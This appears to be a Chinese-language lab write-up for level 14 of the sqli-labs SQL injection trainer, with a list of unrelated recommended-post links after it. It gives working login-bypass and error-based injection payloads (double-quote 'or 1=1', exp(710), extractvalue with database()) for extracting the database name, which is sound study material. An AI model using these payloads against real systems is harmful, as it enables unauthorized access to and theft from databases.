sqllab第十四关通关笔记

知识点:

  • 错误注入
  • 这里的语法是 where username=""
  • 直接进行双引号绕过

通过admin admin登录发现还是没有任何回显

通过bp进行抓包;测试输入内容

构造payload:username=a'+or+1=1#

发现不能成功登录

尝试换成双引号

构造payload:username=a"+or+1=1#

成功登录了

尝试进行错误注入

构造payload:username=a"+or+exp(710)#

错误成功打印到页面上了

尝试利用错误注入获取数据库名

构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了

10

相关推荐
噜噜噜阿鲁~9 分钟前
python学习笔记 | 8.2、函数式编程-返回函数
笔记·python·学习
江湖有缘31 分钟前
容器化部署|Docker搭建Blinko轻量笔记系统
笔记·docker·容器
The_superstar61 小时前
衡山派D133EBS入门笔记
笔记·python·c·衡山派·小曹越
handler011 小时前
Git 核心指令速查
linux·c语言·c++·笔记·git·学习
噜噜噜阿鲁~1 小时前
python学习笔记 | 8.3、函数式编程-匿名函数
笔记·python·学习
YJlio1 小时前
Windows Internals 读书笔记 10.3.3:Task Scheduler 架构详解
人工智能·windows·笔记·python·学习·chatgpt·架构
Lhan.zzZ1 小时前
笔记_2026.4.28_003
c++·笔记·qt·opencv
YaBingSec1 小时前
玄机网络安全靶场:Hadoop YARN ResourceManager 未授权 RCE WP
大数据·数据库·hadoop·redis·笔记·分布式·web安全
曾凡玉@2 小时前
Python 并发编程系统笔记
开发语言·笔记·python
Hello_Embed2 小时前
【无标题】
网络·笔记·网络协议·tcp/ip·嵌入式